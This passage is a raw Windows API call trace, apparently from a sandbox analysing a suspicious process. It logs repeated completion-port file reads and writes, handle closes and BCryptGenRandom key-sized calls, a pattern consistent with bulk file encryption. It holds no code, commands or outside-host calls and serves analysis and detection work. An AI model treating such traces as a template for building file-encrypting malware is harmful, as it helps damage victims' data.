nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.870] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x72c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.871] CloseHandle (hObject=0x338) returned 1 [0200.871] free (_Block=0x3f70048) [0200.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.972] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x756, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.980] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc5a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.993] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0200.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.008] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0201.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.011] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0201.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.169] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.173] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.189] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x64c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0201.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.189] CloseHandle (hObject=0x3cc) returned 1 [0201.190] free (_Block=0x3d70450) [0201.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.230] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.230] free (_Block=0x3e305b8) [0201.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.230] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.231] free (_Block=0x1fa91d0) [0201.231] free (_Block=0x1fa2ed8) [0201.231] free (_Block=0x1fa90b8) [0201.231] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.244] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.244] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.244] free (_Block=0x3e305b8) [0201.244] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.244] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.244] free (_Block=0x1fa91d0) [0201.244] free (_Block=0x1fa2ed8) [0201.244] free (_Block=0x1fa90b8) [0201.245] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.245] CloseHandle (hObject=0x308) returned 1 [0201.246] free (_Block=0x3df0008) [0201.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.246] CloseHandle (hObject=0x3cc) returned 1 [0201.246] free (_Block=0x1ff1e60) [0201.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.260] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.261] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.262] free (_Block=0x3e305b8) [0201.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.262] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.263] free (_Block=0x1fa91d0) [0201.263] free (_Block=0x1fa2ed8) [0201.263] free (_Block=0x1fa90b8) [0201.263] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0201.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.264] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0201.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.277] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.277] CloseHandle (hObject=0x2a8) returned 1 [0201.277] free (_Block=0x3df0008) [0201.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.291] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.291] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.291] free (_Block=0x3e305b8) [0201.291] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.291] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.292] free (_Block=0x1fa91d0) [0201.292] free (_Block=0x1fa2ed8) [0201.292] free (_Block=0x1fa90b8) [0201.292] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.292] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.787] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x93c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.905] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xac8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.905] CloseHandle (hObject=0x2a8) returned 1 [0201.906] free (_Block=0x3df0008) [0201.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.918] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.918] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.918] free (_Block=0x3e305b8) [0201.919] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.919] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.919] free (_Block=0x1fa91d0) [0201.919] free (_Block=0x1fa2ed8) [0201.919] free (_Block=0x1fa90b8) [0201.919] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.923] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.943] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.944] CloseHandle (hObject=0x2a8) returned 1 [0201.944] free (_Block=0x3df0008) [0201.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0201.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0201.959] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.960] free (_Block=0x3e305b8) [0201.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.960] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.960] free (_Block=0x1fa91d0) [0201.960] free (_Block=0x1fa2ed8) [0201.960] free (_Block=0x1fa90b8) [0201.960] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0201.961] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.022] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xea2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.022] CloseHandle (hObject=0x2a8) returned 1 [0202.022] free (_Block=0x3df0008) [0202.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.033] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.033] free (_Block=0x3e305b8) [0202.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.033] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.034] free (_Block=0x1fa91d0) [0202.034] free (_Block=0x1fa2ed8) [0202.034] free (_Block=0x1fa90b8) [0202.034] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.035] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.117] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.118] CloseHandle (hObject=0x2a8) returned 1 [0202.118] free (_Block=0x3df0008) [0202.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, 